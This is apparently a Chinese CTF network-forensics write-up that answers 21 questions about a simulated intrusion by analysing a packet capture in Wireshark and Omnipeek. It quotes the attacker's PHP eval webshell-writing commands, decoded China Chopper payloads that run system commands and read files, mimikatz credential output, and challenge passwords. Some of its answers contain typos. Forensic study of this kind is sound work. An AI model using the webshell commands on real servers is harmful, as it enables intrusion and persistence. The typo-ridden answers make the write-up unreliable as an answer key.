Wareshark&Omnipeek使用----铁三数据赛6.1

铁三的数据赛个人感觉出的非常好，比较适合我这样的新手，有兴趣的师傅们可以来玩一玩啊!
这里给大家共享一下

6.1比赛数据包
链接: https://pan.baidu.com/s/11-T-IeXRFRbdTrn5g96gXQ 
密码: p5j8
解压密码:t3sec.org.cn

5.18比赛数据包
链接: https://pan.baidu.com/s/1H-jbnLtwYfnP_FYmzydlvw 
密码: m7aq

---

6.1比赛

题目给的信息大致就是黑客攻击了一台服务器，并以这个服务器为跳板扫描内网，继续攻击了一台内网主机
记不太清了

题目问题
1.被攻击的两个服务器的内网ip分别是多少，以下简称服务器1和2(格式：空格分隔，按黑客攻击顺序排列）
2.两台服务器的主机名分别是什么
3.黑客使用了什么工具对服务器1进行的攻击(小写)
4.黑容成功登陆网站后台的账号密码以及验证码是什么(格式user/pass/vcode)
5.黑客向服务器1写入webshell的具体命令是什么(url解码后)
6.服务器1都开启了哪些允许外连的TCP注册端口(端口号从小到大，用空格间隔)
7.服务器1安装的修补程序名称
8.网站根目录的绝对路径(注意：大写，左斜杠，最后要有一个斜杠)
9.黑客使用什么命令或文件进行的内网扫描
10.扫描结果中服务器2开放了哪些端口(端口号从小到大，用空格隔开)
11.黑客执行的什么命令将administrator的密码保存到文件中
12.服务器1的系统管理员administrator的密码是什么
13.黑客进行内外扫描的ip范围(格式:xx.xx.xx.xx~xx.xx.xx.xx)
14.服务器1的mysql的root用户的密码是什么
15.黑客在服务器2中查看了哪个敏感文件(拿到shell之后)，请写出绝对路径
16.服务器2的web网站后台账号密码(格式:账号/密码)
17.黑客在redis未授权访问中反弹shell的ip和端口是多少
18.黑客拿到root权限后执行的第二条命令是什么
19.服务器2的root用户密码是什么
20.黑客向服务器2写入webshell的命令
21.pcap中哪些ip发送过无偿ARP包(空格分隔，时间顺序排序)

1个G+的流量包，首先wareshark导出http特定分组.

1.被攻击的两个服务器的内网ip分别是多少，以下简称服务器1和2

然后用Omnipeek打开导出的http包，查看peerMap

peerMap1.png

直接就可以看到192.1681.74与202.1.1.2之间的颜色最亮，而且没有其他的线，很奇怪，所以初步判断这两个有问题，然后在导出第二个数据包，在继续看

peerMap2.png

仍然192.1681.74与202.1.1.2之间的颜色最亮，在打开第三个

peerMap3.png
第四个 peerMap4.png
第5个 peerMap5.png
第6个 peerMap6.png
啊，可以很清楚的看到这三个主机很符合题意，并且比赛的时候一道题有5次提交机会，想错都难.....
不过看图也能发现是谁先与内网建立连接的，肯定就是那两个主机

第一题答案
192.168.1.74 192.168.2.66

---

接下来就只需要分析三个主机之间的故事就好 了
用wareshark导出这三个主机之间的故事
(ip.addr== 202.1.1.2 || ip.addr == 192.168.1.74||ip.addr == 192.168.2.66) 
导出分组
剩下的就简单了，已经没有混淆流量了。

---

2.两台服务器的主机名分别是什么

说到主机名，考虑phpinfo，然后使用wareshark直接搜关键字

不知道还有没有其他的方法呢，欢迎小伙伴们补充
本菜不知道其他方法

找第一个主机的phpinfo

ip.addr== 192.168.1.74 && http contains "phpinfo"

然后追踪http流，保存文档为html host1.png

同理，另外一台主机也有了(第2个和第六个)

host2.png

答案
TEST-7E28AF8836
cloude

---

3.黑客使用了什么工具对服务器1进行的攻击(小写)

这个太简答 了，直接看就好

sqlmap.png

答案
salmap

---

4.黑容成功登陆网站后台的账号密码以及验证码是什么(格式user/pass/vcode)

工具分析，黑客是在第二个数据包中拿到了1.74的权限，直接看攻击者干了什么

ip.addr== 202.1.1.2 && http.request.method == "POST"

login.png

答案
admin/adminlwphp/WD7x

---

5.黑客向服务器1写入webshell的具体命令是什么(url解码后)

直接看攻击者干了什么

ip.src == 202.1.1.2

一查就能看到敏感单词cmd cmd.png

url解码
13312   632.176257  202.1.1.2   192.168.1.74    HTTP    489 GET /tmpbjhbf.php?
cmd=echo ^<?php^ eval($_POST[ge]);?^>>abc.php HTTP/1.1 

典型的中国菜刀一句话木马

答案
echo^<?php^ eval($_POST[ge]);?^>>abc.php

---

6.服务器1都开启了哪些允许外连的TCP注册端口(端口号从小到大，用空格间隔)

黑客已经拿中国菜刀连接上了，而且是windows电脑，所以会用到netstat指令
对指令进行过滤

ip.addr== 202.1.1.2 || ip.addr == 192.168.1.74 && http contains "abc"

可以看到聪明的黑客对指令进行了base64编码
逐条解密

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
$m=get_magic_quotes_gpc();$f=$m?stripslashes($_POST["z1"]):$_POST["z1"];
echo(mkdir($f)?"1":"0");;echo("|<-");die();

直接查看端口 port.png

答案
80135 139 445 1025 3306 3389
1025，3306，3389(可外连)

---

7.服务器1安装的修补程序名称

继续向下看黑客使用了哪些命令
隔一两条就能发现解码如下的东西

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();&z1=cmd&z2=cd /d "C:\WWW\"&systeminfo&echo [S]&cd&echo [E]

可以看到使用了systeminfo函数，查阅资料可以看到是有修补维护程序功能的 pack.png

答案
Q147222

---

8.网站根目录的绝对路径(注意：大写，左斜杠，最后要有一个斜杠)

root.png

根据之前的也可以知道，直接就是那个

C:/www/

---

9.黑客使用什么命令或文件进行的内网扫描

这个题想到了比赛时候渗透那个题，学长还是厉害，给一个什么都没有的主机装了一大堆工具，然后扫描内网，爽歪歪....

不过扫描内网还是主机和第一个服务器发送大量请求，并且第一个服务器在扫描截断会发送大量的包，而且是在第三个数据包中才有另外一个主机. scan(导出相应的包后可以看到的Map).png 不过后来直接在浏览过程中发现了一个有意思的文件名scan.php scan.png

答案
scan.php

---

10.扫描结果中服务器2开放了哪些端口(端口号从小到大，用空格隔开)

老套路

ip.addr== 202.1.1.2 || ip.addr == 192.168.1.74 && http contains "scan"

这里被自己坑了，找了半天没有找到，以后确定了ip就要回到原ip中重新导出相应ip的包，删除无效包切记切记

最后返回源文件中终于找到了相应ip port_3.png

密码
803306 6379

---

12.服务器1的系统管理员administrator的密码是什么

同样是在第三个数据包中，继续向下看

mimikz.png
追踪流，直接看到被改的密码 change.png

 Username : Administrator
 Password : Simplexue123

---

11.黑客执行的什么命令将administrator的密码保存到文件中

继续在这附近找，最终解码如下 change.png

z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();&z1=C:\\WWW\\my\\mimi\\log.txt

答案

log.txt

---

13.黑客进行内外扫描的ip范围(格式:xx.xx.xx.xx~xx.xx.xx.xx)

前面找端口的时候可以直接看到ip范围

答案
192.168.1.1~192.168.3.255

---

14.服务器1的mysql的root用户的密码是什么

直接搜索关键字sql

然后在第四个包中就能找到 db.png

答案
$mydbhost="localhost";
$mydbuser="root";
$mydbpw ="windpasssql";
$mydbname="510cms";

---

15.黑客在服务器2中查看了哪个敏感文件(拿到shell之后)，请写出绝对路径 catcat.png

答案
/etc/shadow

---

16.服务器2的web网站后台账号密码(格式:账号/密码)

直接搜关键字root 或者admin

在第六个包中可以找到 pw.png

答案
admin/112233.com
root/7u8i9o0p

---

17.黑客在redis未授权访问中反弹shell的ip和端口是多少

前面顺便可以找到15

答案
202.1.1.2/6666

---

18.黑客拿到root权限后执行的第二条命令是什么

前面顺便可以找到

答案
cd/var/www/html

---

19.服务器2的root用户密码是什么

Simplexue123

emmmmmmm
这个考脑洞，自己体会

---

20.黑客向服务器2写入webshell的命令

也顺便可以找到

答案
`echo'<?php eval($_POST[a]);'>indexs.php`

---

21.pcap中哪些ip发送过无偿ARP包(空格分隔，时间顺序排序)

google一下就能知道无偿arp包与arp有关，同时无偿包有如下特点 https://blog.csdn.net/chiyuwei1766/article/details/50717588.png

直接搜关键字

arp && arp.isgratuitous == true

然后在第1个和第4个里面可以找到

forth.png
first.png

答案
192.168.3.213
192.168.3.6
192.168.3.19